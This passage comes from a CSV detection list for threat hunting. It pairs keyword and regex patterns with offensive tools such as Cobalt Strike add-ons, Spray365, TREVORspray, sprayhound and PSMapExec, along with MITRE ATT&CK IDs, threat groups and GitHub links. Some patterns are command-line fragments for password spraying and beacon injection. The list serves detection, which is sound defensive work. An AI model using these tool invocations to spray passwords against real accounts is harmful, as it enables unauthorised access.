tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*spoolss_##*",".{0,1000}spoolss_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*spoolsystem inject*",".{0,1000}spoolsystem\sinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*spoolsystem spawn*",".{0,1000}spoolsystem\sspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" 
"*spoolsystem.cna*",".{0,1000}spoolsystem\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x64.dl*",".{0,1000}SpoolTrigger\.x64\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x64.dll*",".{0,1000}SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x86.dl*",".{0,1000}SpoolTrigger\.x86\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x86.dll*",".{0,1000}SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger\SpoolTrigger.*",".{0,1000}SpoolTrigger\\SpoolTrigger\..{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*Spray an empty password across the Domain*",".{0,1000}Spray\san\sempty\spassword\sacross\sthe\sDomain.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*spray* --recon *.* -u *.txt --threads 10*",".{0,1000}spray.{0,1000}\s\-\-recon\s.{0,1000}\..{0,1000}\s\-u\s.{0,1000}\.txt\s\-\-threads\s10.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*Spray365.git*",".{0,1000}Spray365\.git.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*spray365.py*",".{0,1000}spray365\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*spray365_results_*.json*",".{0,1000}spray365_results_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*Spray-AD *",".{0,1000}Spray\-AD\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable 
passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD.cna*",".{0,1000}Spray\-AD\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD.dll*",".{0,1000}Spray\-AD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*SprayAD.exe *",".{0,1000}SprayAD\.exe\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - 
T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Spray-AD.exe*",".{0,1000}Spray\-AD\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD.sln*",".{0,1000}Spray\-AD\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD\Spray-AD*",".{0,1000}Spray\-AD\\Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*sprayhound -*",".{0,1000}sprayhound\s\-.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*sprayhound -d *",".{0,1000}sprayhound\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sprayhound-master.zip*",".{0,1000}sprayhound\-master\.zip.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*Spraying empty passwords*",".{0,1000}Spraying\sempty\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Spraying usernames as passwords*",".{0,1000}Spraying\susernames\sas\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Spraying\*-AccountAsPassword-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-AccountAsPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Spraying\*-Password-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-Password\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*SprayingToolkit.git*",".{0,1000}SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*SprayingToolkit-master*",".{0,1000}SprayingToolkit\-master.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*SprayingToolkit-master.zip*",".{0,1000}SprayingToolkit\-master\.zip.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
